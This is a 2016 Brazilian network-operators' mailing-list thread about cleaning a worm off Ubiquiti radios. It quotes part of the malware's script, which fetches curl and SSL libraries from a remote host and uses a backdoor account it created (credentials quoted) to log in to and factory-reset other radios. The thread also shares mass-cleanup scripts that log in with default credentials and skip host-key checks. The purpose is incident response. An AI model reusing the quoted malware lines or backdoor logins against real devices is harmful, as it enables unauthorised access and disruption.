[GTER] RES: RES: RES: Script remoção virus UBNT - ** remove e atualiza **
Rafael Stein
rafaelpstein at gmail.com
Mon May 16 18:52:01 -03 2016
Pessoal não sei se ajuda mas olhando os scripts do vírus acredito que seja
bom bloquear todos os acessos ao destino downloads.openwrt.org
Segue trecho do script
test -e $per/curl || dwn
http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/curl_7.17.1-1_
mips.ipk usr/bin/curl
chmod +x $per/curl
test -e $per/libcurl.so.4 || dwn
http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/libcurl_7.17.1
-1_mips.ipk usr/lib/libcurl.so.4.0.1
mv $per/libcurl.so.4.0.1 $per/libcurl.so.4
test -e $per/libssl.so.0.9.8 || dwn
http://downloads.openwrt.org/kamikaze/8.09.1/adm5120/packages/libopenssl_0.9
.8i-3.1_mips.ipk 'usr/lib/lib*'
Outra coisa é que ele cria um usuário mother e senha fucker no radio e assim
da pra acessar o radio que tenha a gerencia perdida
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F
"uri=index.cgi" -F "username=mother" -F "password=fucker" -H "Expect:"
"$url/login.cgi"
LD_LIBRARY_PATH=/etc/persistent/.mf/ ./curl -m 3 -s -k -b cookie -L -F
"uri=reset.cgi" -H "Expect:" "${url}/reset.cgi"
Acredito que com isso de pra resolver alguns problemas sem ir no local.
-----Mensagem original-----
De: gter [mailto:gter-bounces at eng.registro.br] Em nome de Alexandre J.
Correa (Onda)
Enviada em: segunda-feira, 16 de maio de 2016 16:44
Para: Grupo de Trabalho de Engenharia e Operacao de Redes
<gter at eng.registro.br>
Assunto: Re: [GTER] RES: RES: Script remoção virus UBNT - ** remove e
atualiza **
Diego, uma das variantes faz o upload inicial dentro desta pasta 'upload',
mas ela é uma pasta que não fica no disco, se rebootar o rádio, ela some com
o conteúdo.
Em 16/05/2016 14:38, Diego Canton de Brito escreveu:
> Poderia explicar a necessidade desse RM?
> A pasta para mim está vazia.
>
> Att,
>
> -----Mensagem original-----
> De: gter [mailto:gter-bounces at eng.registro.br] Em nome de Gabriel
> Mineiro Enviada em: segunda-feira, 16 de maio de 2016 14:15
> Para: Grupo de Trabalho de Engenharia e Operacao de Redes
> Assunto: [GTER] RES: Script remoção virus UBNT - ** remove e atualiza
> **
>
> Ninguém está limpando a pasta /var/tmp/upload? A menos não vi nos scripts
sugeridos. O aplicativo da Ubnt não remove.
>
> Gabriel Mineiro
> www.tca.com.br
>
> -----Mensagem original-----
> De: gter [mailto:gter-bounces at eng.registro.br] Em nome de Guilherme
> Ganascim Enviada em: segunda-feira, 16 de maio de 2016 07:53
> Para: Grupo de Trabalho de Engenharia e Operacao de Redes
> <gter at eng.registro.br>
> Assunto: Re: [GTER] Script remoção virus UBNT - ** remove e atualiza
> **
>
> Para quem estiver com problema, estou usando um FOR para limpar tudo
> de uma vez, troca a porta e desativa o HTTPs e coloca um LOG para
> verificar depois;
>
> ##
> for IP in `cat ips`;do sshpass -p ‘ubnt’ ssh -o "ConnectTimeout 15"
> -o "StrictHostKeyChecking no" -o "UserKnownHostsFile=/dev/null"
> ubnt@$IP -p22 'cd /etc/persistent/ ; rm mf.tar; rm rc.poststart ; rm
> -R .mf ; sed -i 's/sshd.port=22/sshd.port=2222/g' /tmp/system.cfg;echo
> httpd.port=81 >> /tmp/system.cfg;echo httpd.https.status=disabled >>
> /tmp/system.cfg; cfgmtd -p /etc/persistent/ -w ; cat /tmp/system.cfg |
> grep wireless.1.ssid | grep mot && echo "NAO DEU" || reboot' >>
> /tmp/analise.log 2>&1 & sleep 1;done
>
> Obrigado
>
> 2016-05-15 18:32 GMT-03:00 Elizandro Pacheco [ Pacheco Tecnologia ] <
> elizandro at pachecotecnologia.net>:
>
>> Ferramenta Oficial:
>>
>>
>> http://community.ubnt.com/t5/airMAX-General-Discussion/Malware-Remova
>> l
>> -Tool-05-15-2016/m-p/1564953#U1564953
>>
>>
>> Poderiam unir as threads né?
>>
>>
>> Elizandro Pacheco
>>
>>
>>> Em 15 de mai de 2016, à(s) 14:32, Diego Canton de Brito <
>> diegocanton at ensite.com.br> escreveu:
>>> Obrigado Alexandre, atualizado
>>>
>>> Em 2016-05-15 02:34, Alexandre J. Correa (Onda) escreveu:
>>>
>>>> Versão que remove e atualiza o rádio
>>>>
>>>> #!/bin/sh
>>>> #ajcorrea
>>>>
>>>> /bin/sed -ir '/mcad/ c ' /etc/inittab /bin/sed -ir '/mcuser/ c '
>>>> /etc/passwd /bin/rm -rf /etc/persistent/https /bin/rm -rf
>>>> /etc/persistent/mcuser /bin/rm -rf /etc/persistent/mf.tar /bin/rm
>>>> -rf /etc/persistent/.mf /bin/rm -rf /etc/persistent/rc.poststart
>>>> /bin/rm -rf /etc/persistent/rc.prestart /bin/kill -HUP `/bin/pidof
>>>> init` /bin/kill -9 `/bin/pidof mcad` /bin/kill -9 `/bin/pidof init`
>>>> /bin/kill -9 `/bin/pidof search` /bin/kill -9 `/bin/pidof mother`
>>>> /bin/kill -9 `/bin/pidof sleep` /bin/cfgmtd -w -p /etc/
>>>>
>>>> versao=`cat /etc/version | cut -d'.' -f1` cd /tmp
>>>>
>>>> if [ "$versao" == "XM" ]; then
>>>> URL='
>>
http://dl.ubnt.com/firmwares/XN-fw/v5.6.4/XM.v5.6.4.28924.160331.1253.bin'
>>>> wget $URL
>>>> ubntbox fwupdate.real -m /tmp/XM.v5.6.4.28924.160331.1253.bin
>>>> else
>>>> URL='
>>
http://dl.ubnt.com/firmwares/XW-fw/v5.6.4/XW.v5.6.4.28924.160331.1238.bin'
>>>> wget $URL
>>>> ubntbox fwupdate.real -m /tmp/XW.v5.6.4.28924.160331.1238.bin
>>>> fi
>>>>
>>>> Diego Canton, atualiza o GITHUB lá que este procedimento já ajuda
>> bastante a galera...
>>> --
>>> gter list https://eng.registro.br/mailman/listinfo/gter
>> --
>> gter list https://eng.registro.br/mailman/listinfo/gter
>>
>
>
> --
> Guilherme Ganascim
> Mobile: +554399526000
> --
> gter list https://eng.registro.br/mailman/listinfo/gter
> --
> gter list https://eng.registro.br/mailman/listinfo/gter
>
>
> --
> gter list https://eng.registro.br/mailman/listinfo/gter
--
Sds.
Alexandre Jeronimo Correa
Onda Internet
Office: +55 34 3351 3077
www.onda.net.br
--
gter list https://eng.registro.br/mailman/listinfo/gter
More information about the gter
mailing list